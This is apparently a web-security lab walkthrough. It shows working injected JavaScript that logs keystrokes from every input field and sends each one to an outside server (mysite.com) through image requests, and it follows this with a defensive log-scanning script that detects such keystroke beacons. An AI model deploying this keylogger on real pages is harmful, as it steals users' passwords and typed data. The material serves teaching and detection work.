Task 7 [Try Now]
Objectives:
- Create a KeyLogger which posts Keystrokes live to an attacker server
In the previous task you learnt about intercepting the click event. In this case we are supposed to capture the keyboard events and post them to the attacker's server.
The user will only type into input fields, so adding listeners to the entire DOM is not a good approach. Instead, we will find all input elements and attach the event listener to each of them.
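// Attach a keyup listener to every <input> element on the page
document.querySelectorAll("input").forEach((input) => {
  input.addEventListener("keyup", (e) => {
    // Loading an image issues a GET that carries the field name and the key
    new Image().src = "http://mysite.com?input=" + e.target.name + "&key=" + e.key;
  });
});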
I am using e.target.name to get the name of the input where the keyup event is happening, and e.key will contain the character being pressed by the user (or you can use e.keyCode to get the ASCII code of the key). This time I have not used preventDefault(), because I didn't want to block the default behavior of the event.
As you have seen, I am using new Image().src to perform the GET request. This is because some sandboxed browsers might block so many ajax requests.
Note: The keyup event is triggered whenever the victim releases a key after pressing it.
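From the defender's side, the pattern described above (one cross-origin image GET per key release, with the key in the query string) stands out in proxy logs. The following is an added example, not part of the original lab: it scans constructed log lines for bursts of such requests. The log format, host names, function names and thresholds are all assumptions.

```javascript
// Constructed proxy log lines: "<epoch-ms> <client-ip> <method> <url> <page-origin>"
const SAMPLE_LOG = [
  "1700000000000 10.0.0.5 GET https://shop.example/img/logo.png https://shop.example",
  "1700000000100 10.0.0.5 GET http://collector.example/?input=user&key=a https://shop.example",
  "1700000000400 10.0.0.5 GET http://collector.example/?input=user&key=l https://shop.example",
  "1700000000700 10.0.0.5 GET http://collector.example/?input=user&key=i https://shop.example",
  "1700000001000 10.0.0.5 GET http://collector.example/?input=pass&key=Shift https://shop.example",
  "1700000001200 10.0.0.5 GET http://collector.example/?input=pass&key=P https://shop.example",
  "1700000001500 10.0.0.5 GET http://collector.example/?input=pass&key=Enter https://shop.example",
  "1700000002000 10.0.0.9 GET https://stats.example/px.gif?page=checkout&v=2 https://shop.example",
  "1700000003000 10.0.0.9 GET https://stats.example/px.gif?page=cart&v=3 https://shop.example",
];
// e.key values for non-printing keys (partial list)
const NAMED_KEYS = new Set(["Enter", "Tab", "Shift", "Backspace", "Control", "Alt", "Escape"]);

function parseLine(line) {
  const [ts, client, method, url, origin] = line.split(" ");
  return { ts: Number(ts), client, method, url: new URL(url), origin: new URL(origin) };
}

// Cross-origin GET whose query carries one character or a named key: one keystroke per request.
function isKeystrokeBeacon(req) {
  if (req.method !== "GET" || req.url.host === req.origin.host) return false;
  return [...req.url.searchParams.values()].some((v) => [...v].length === 1 || NAMED_KEYS.has(v));
}

// Flag client/destination pairs with at least `threshold` such requests inside `windowMs`.
function findKeystrokeExfil(lines, { windowMs = 10000, threshold = 5 } = {}) {
  const seen = new Map(); // "client -> host" => beacon timestamps
  for (const req of lines.map(parseLine).filter(isKeystrokeBeacon)) {
    const id = `${req.client} -> ${req.url.host}`;
    seen.set(id, [...(seen.get(id) || []), req.ts]);
  }
  const alerts = [];
  for (const [id, stamps] of seen) {
    stamps.sort((a, b) => a - b);
    for (let start = 0, end = 0; end < stamps.length; end++) {
      while (stamps[end] - stamps[start] > windowMs) start++;
      if (end - start + 1 >= threshold) { alerts.push(id); break; }
    }
  }
  return alerts;
}

console.log(findKeystrokeExfil(SAMPLE_LOG));
```

The two stats.example requests also carry a one-character value but stay below the threshold, which is why the rule counts a burst instead of alerting on a single request.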
For POC, Click Here